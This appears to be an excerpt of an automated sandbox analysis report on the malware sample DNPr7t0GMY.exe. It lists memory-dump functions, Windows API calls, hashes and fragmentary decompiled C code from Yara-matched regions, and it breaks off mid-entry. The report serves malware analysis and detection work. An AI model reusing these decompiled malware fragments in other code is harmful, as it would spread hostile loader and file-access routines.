                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: f8d6fbde76a13006bf0db7c6dee6c6559c77b4f99f0d78370cd10a38956d7d1f
                                                                                            • Instruction ID: ca229e10dc87bc443030786b78d867c1b0ad458b1fb7e30a9ae3a83ea7af35ce
                                                                                            • Opcode Fuzzy Hash: f8d6fbde76a13006bf0db7c6dee6c6559c77b4f99f0d78370cd10a38956d7d1f
                                                                                            • Instruction Fuzzy Hash: 5D5143B09006499FDB14DFAADA88BDEBBF0EB8D314F248459E419B7350DB349884CF65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0313BBB8, Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0313BE0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 68c9f8deed8ed42668f397dad27bd37fe6cb0bfa8afa40c5ca37a7d4bf6d1ddc
                                                                                            • Instruction ID: e6446193bc586c6a53cf1d375c1cff44f8385cef4ae69f27a81e09f866f50b36
                                                                                            • Opcode Fuzzy Hash: 68c9f8deed8ed42668f397dad27bd37fe6cb0bfa8afa40c5ca37a7d4bf6d1ddc
                                                                                            • Instruction Fuzzy Hash: 3D715770A04B058FDB24DF2AD04075ABBF5FF89214F04892DD49ADBA40EB35E945CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0313DC6D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0313DD8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: 1a5a57d899f1e26a22674e2fc804b379e09e2b6a22e419a759eb2ebd9e88766e
                                                                                            • Instruction ID: 6c789e2c4d0e7a6baf4d44afcf08b83ffc922da82cdc41f9c016e26bdbb8cc67
                                                                                            • Opcode Fuzzy Hash: 1a5a57d899f1e26a22674e2fc804b379e09e2b6a22e419a759eb2ebd9e88766e
                                                                                            • Instruction Fuzzy Hash: BF51B0B1D10348EFDB14CF99D984ADEFBB5BF88314F24812AE819AB250D7749945CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0313DC78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0313DD8A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: 80e50a5b6b312e1e89e489d90f5d1e6d42d24ddcadbbb64f21df2cb81134b749
                                                                                            • Instruction ID: 154e8503631bded20a7427fbf15319abf78bf6373045f1c2b98c6af2c0d49bc2
                                                                                            • Opcode Fuzzy Hash: 80e50a5b6b312e1e89e489d90f5d1e6d42d24ddcadbbb64f21df2cb81134b749
                                                                                            • Instruction Fuzzy Hash: E441BEB1D10348EFDB14CF99D884ADEFBB5BF88310F24812AE819AB250D7749845CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 03136D41, Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 03136E3F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 9afa23ecf8b15dd7dc62955a9b39de30945f46cc4bc695a380bd69d7aaac600b
                                                                                            • Instruction ID: 22380703d6c3f747618a719fe392405d9f556626e11ed830192d85de535007b7
                                                                                            • Opcode Fuzzy Hash: 9afa23ecf8b15dd7dc62955a9b39de30945f46cc4bc695a380bd69d7aaac600b
                                                                                            • Instruction Fuzzy Hash: 92416876900248AFCB01DFA9D840AEEBFF9EF8D310F04805AFA44A7251C7359954DFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 03136DB0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 03136E3F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 603ed6d2a06597d8952ed0d5128412d8fad8e000d9da3a3e4b3956bcb079bbf7
                                                                                            • Instruction ID: 5417fdc680e6177d6a21c8efa7a140a2c338bd6e3cabdac52b175bf26b18fc9c
                                                                                            • Opcode Fuzzy Hash: 603ed6d2a06597d8952ed0d5128412d8fad8e000d9da3a3e4b3956bcb079bbf7
                                                                                            • Instruction Fuzzy Hash: A321E3B5901208AFDB10DFAAD984ADEFBF8EF48324F14801AE914B7350D374A954CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 03136DB8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 03136E3F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 1ee8bf4b007572d084907d4ebad1ae58b90172fc77841e14467715852ac39056
                                                                                            • Instruction ID: fe3d495c90795cc6e1c18dd2c781607f515de156aa8d325b477d94f556de323a
                                                                                            • Opcode Fuzzy Hash: 1ee8bf4b007572d084907d4ebad1ae58b90172fc77841e14467715852ac39056
                                                                                            • Instruction Fuzzy Hash: 6F21C2B5901248AFDB10CFAAD984ADEFBF8EB48324F14841AE914B7350D374A954CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0313B0E8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0313BE89,00000800,00000000,00000000), ref: 0313C09A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 7f3db916e6870ad36bbb592d70221a00ed578816bfbc99021d28ce503d5bde83
                                                                                            • Instruction ID: 5d2df5153a370b04beeb141e92c2aa5464d0301624b004ed7da313ed4e4d13d1
                                                                                            • Opcode Fuzzy Hash: 7f3db916e6870ad36bbb592d70221a00ed578816bfbc99021d28ce503d5bde83
                                                                                            • Instruction Fuzzy Hash: 111133B68002488FCB20DFAAC444BDEFBF4EB89324F04842AE815B7200C375A945CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0313C028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0313BE89,00000800,00000000,00000000), ref: 0313C09A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: b1f3ee0a4d93c92072bdcdf7b6387a54b206a5ac2d15f08696953d78934a5c87
                                                                                            • Instruction ID: 12e8fc0bb4e8f233cccf15697860884fdc888015a0a07038c71708ecc5c53e3d
                                                                                            • Opcode Fuzzy Hash: b1f3ee0a4d93c92072bdcdf7b6387a54b206a5ac2d15f08696953d78934a5c87
                                                                                            • Instruction Fuzzy Hash: 0B1103B6C003499FDB10DFAAC484BDEFBF4AB89324F14855AE919B7200C375A549CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0313BDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0313BE0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 25e06b1c3690b235508272bbd6f5a662355c9b56c60ab3c473b4d009a283e3d7
                                                                                            • Instruction ID: 2e2c1d981db49df2bac32202cb39b446a67a3d1c8a9fb778bf24c4854a8419b3
                                                                                            • Opcode Fuzzy Hash: 25e06b1c3690b235508272bbd6f5a662355c9b56c60ab3c473b4d009a283e3d7
                                                                                            • Instruction Fuzzy Hash: CF110FB2C002498FDB20DF9AC844ADEFBF4EB88224F14842AD819A7200D374A545CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0313DEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(?,?,?), ref: 0313DF1D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1378638983-0
                                                                                            • Opcode ID: 3e94329523e3afa8fbefc4bb32c75669724f49e57acb67b6ed952ab4108df334
                                                                                            • Instruction ID: 63027f00c66b32e963422b6c6349e6797a23291aecaff9d798950921f129ec58
                                                                                            • Opcode Fuzzy Hash: 3e94329523e3afa8fbefc4bb32c75669724f49e57acb67b6ed952ab4108df334
                                                                                            • Instruction Fuzzy Hash: 511112B58002089FDB20DF9AD584BDEFBF8EB88320F14841AE919B7340C374A944CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0313DEB9, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(?,?,?), ref: 0313DF1D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1378638983-0
                                                                                            • Opcode ID: 086a9306a8442f46e6292b62e203f9525d62842a0f6986219ea6a557eea935f9
                                                                                            • Instruction ID: 11032989118c8cd83fe2c0785cba98881e94ab1b4981e4cc76f96bba2e0d3d55
                                                                                            • Opcode Fuzzy Hash: 086a9306a8442f46e6292b62e203f9525d62842a0f6986219ea6a557eea935f9
                                                                                            • Instruction Fuzzy Hash: 6E1100B58002098FDB10DF99D584BDEBBF8EB88324F24841AE819B7340C374A945CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0191D4D8, Relevance: .1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220041458.000000000191D000.00000040.00000001.sdmp, Offset: 0191D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1f2c26756660ebf7219de1f5e9e27e0972e7210e7e0748cd3412c365e91ddedf
                                                                                            • Instruction ID: f60b10a8d2263c33d2e9bc8262874dc8968dd6dccd2f257e631619bb7b0d835a
                                                                                            • Opcode Fuzzy Hash: 1f2c26756660ebf7219de1f5e9e27e0972e7210e7e0748cd3412c365e91ddedf
                                                                                            • Instruction Fuzzy Hash: DC2128B1504208DFDF05DF98D9C4F26BFA5FB88328F248569E9094B24EC336D896C7A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0192D01C, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220069667.000000000192D000.00000040.00000001.sdmp, Offset: 0192D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 704c3398c34d7035abd0644c0169f0f5bf7d87ab282ed19fad87d2f80c425125
                                                                                            • Instruction ID: e41ab2ba366e82096605ef2c444be6c8ae8575e2d763358e95f473c5ed5d8fd7
                                                                                            • Opcode Fuzzy Hash: 704c3398c34d7035abd0644c0169f0f5bf7d87ab282ed19fad87d2f80c425125
                                                                                            • Instruction Fuzzy Hash: 9C212571544240DFDB11DF64D8C0B26BBA5FB84354F20C9A9E90D4B25AC33AD807CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0192D006, Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220069667.000000000192D000.00000040.00000001.sdmp, Offset: 0192D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0b8ba68650b25122be956eb46e8dc077c31cc0ebb6feef63cf92c92b2b4b917a
                                                                                            • Instruction ID: 20e7f97cefd8d2c95b9b03b774e1773bab834f59d5b1e4475176cc18e4fda1be
                                                                                            • Opcode Fuzzy Hash: 0b8ba68650b25122be956eb46e8dc077c31cc0ebb6feef63cf92c92b2b4b917a
                                                                                            • Instruction Fuzzy Hash: D82192755493808FCB13CF24D990715BFB1EB46214F28C5EAD8498F667C33AD80ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0191D4D3, Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220041458.000000000191D000.00000040.00000001.sdmp, Offset: 0191D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
                                                                                            • Instruction ID: 1d8637e7090071eb14808af1804347f24e75ec3a3094152ebdc345d906ba9339
                                                                                            • Opcode Fuzzy Hash: db75533cb9b6fa6099b867bfc3a53cb548d3d4cf5ca75b8a66c096981064a356
                                                                                            • Instruction Fuzzy Hash: E411D376404284CFDB16CF54D5C4B16BFB1FB84324F24C6A9D8090B61BC33AD49ACBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0191D749, Relevance: .0, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220041458.000000000191D000.00000040.00000001.sdmp, Offset: 0191D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 62596bbc949d1982e971187dda325b750efd53afee35af94758eac4bd376d90b
                                                                                            • Instruction ID: 997680af05194b4115a3227f1a4550373cf4c9f3988b53723de42d33e8b6dac4
                                                                                            • Opcode Fuzzy Hash: 62596bbc949d1982e971187dda325b750efd53afee35af94758eac4bd376d90b
                                                                                            • Instruction Fuzzy Hash: F201ACB14083889AFB205B65CC88B66FBDCEF45274F188559ED0D5B24BC3799484C6B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0191D748, Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220041458.000000000191D000.00000040.00000001.sdmp, Offset: 0191D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 64d1e17869e7597b270446cffbc49ca235720b8b335262005fad6068ac8479da
                                                                                            • Instruction ID: 71f5e4fbc461bb6c3d03ff9446e90dd18211815c7dd1e4551ece9d607ecef2e0
                                                                                            • Opcode Fuzzy Hash: 64d1e17869e7597b270446cffbc49ca235720b8b335262005fad6068ac8479da
                                                                                            • Instruction Fuzzy Hash: 4BF068714042849EFB119E59DC84762FFDCEF81634F18C45AED085B287C3795844CAB1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 0313C2B0, Relevance: .5, Instructions: 522COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 466c44893ecfba048e95c5539bd6bc5cbc63f84f33cb9afc36f83bff7baa932e
                                                                                            • Instruction ID: f894adc3a2a11b8449c0dbea63e0fbd43308b4a778bc185ead0ff8e2efcff40f
                                                                                            • Opcode Fuzzy Hash: 466c44893ecfba048e95c5539bd6bc5cbc63f84f33cb9afc36f83bff7baa932e
                                                                                            • Instruction Fuzzy Hash: 80528EB1500706CFD718EF98E8C81997BB3FB4A318F515208D1926B6D9D3B465CACFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 031399A0, Relevance: .3, Instructions: 265COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.220173246.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1e8498dea3c648ccba90f0cc888cf71a8761f4978b737e1e70c717b9d956a062
                                                                                            • Instruction ID: 14b80a8647a4b11190602cfbd67c187d129c5a63e963595ae725ff40903eaaa7
                                                                                            • Opcode Fuzzy Hash: 1e8498dea3c648ccba90f0cc888cf71a8761f4978b737e1e70c717b9d956a062
                                                                                            • Instruction Fuzzy Hash: 3BA17F36E007198FCF05DFA5C8445DEBBB6FF8A300B15856AE805BB225EB71A955CB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Analysis Process: DNPr7t0GMY.exe PID: 6588 Parent PID: 6428 DNPr7t0GMY.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 004182AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 24%
                                                                                            			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t22;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;

				if(__eflags != 0) {
					asm("in al, dx");
					_t17 = _a8;
					_t34 = _a8 + 0xc48;
					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
					_t6 =  &_a36; // 0x413d42
					_t12 =  &_a12; // 0x413d42
					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
					return _t22;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t14 = __eax + 0x10; // 0x300
					_t15 = __eax + 0xc4c; // 0x40972f
					__esi = _t15;
					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}









                                                                                            0x004182ae
                                                                                            0x00418262
                                                                                            0x00418263
                                                                                            0x0041826f
                                                                                            0x00418277
                                                                                            0x00418282
                                                                                            0x0041829d
                                                                                            0x004182a5
                                                                                            0x004182a9
                                                                                            0x004182b0
                                                                                            0x004182b1
                                                                                            0x004182b3
                                                                                            0x004182b6
                                                                                            0x004182bf
                                                                                            0x004182bf
                                                                                            0x004182cf
                                                                                            0x004182d5
                                                                                            0x004182d7
                                                                                            0x004182d8
                                                                                            0x004182d9
                                                                                            0x004182d9

                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID: B=A$B=A
                                                                                            • API String ID: 2738559852-2767357659
                                                                                            • Opcode ID: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
                                                                                            • Instruction ID: 196597b99329607a985bdc56155312d81ebdbcd7e96d663e18f2c25ff9a64cf5
                                                                                            • Opcode Fuzzy Hash: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
                                                                                            • Instruction Fuzzy Hash: F9110972200204AFCB14DF99DC85EEB77A9EF8C754F158659BA1D97241CA30E911CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 21%
                                                                                            			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				asm("in al, dx");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}







                                                                                            0x00418262
                                                                                            0x00418263
                                                                                            0x0041826f
                                                                                            0x00418277
                                                                                            0x00418282
                                                                                            0x0041829d
                                                                                            0x004182a5
                                                                                            0x004182a9

                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID: B=A$B=A
                                                                                            • API String ID: 2738559852-2767357659
                                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                            • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                            • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00409B10(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                            0x00409b2c
                                                                                            0x00409b2f
                                                                                            0x00409b34
                                                                                            0x00409b39
                                                                                            0x00409b43
                                                                                            0x00409b48
                                                                                            0x00409b4b
                                                                                            0x00409b4d
                                                                                            0x00409b55
                                                                                            0x00409b5a
                                                                                            0x00409b5a
                                                                                            0x00409b61
                                                                                            0x00409b69
                                                                                            0x00409b6c
                                                                                            0x00409b6e
                                                                                            0x00409b82
                                                                                            0x00000000
                                                                                            0x00409b84
                                                                                            0x00409b8a
                                                                                            0x00409b3e
                                                                                            0x00409b3e
                                                                                            0x00409b3e

                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                            • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                            • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                            0x004181bf
                                                                                            0x004181c7
                                                                                            0x004181fd
                                                                                            0x00418201

                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.271117141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                            • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                            • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041838B, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
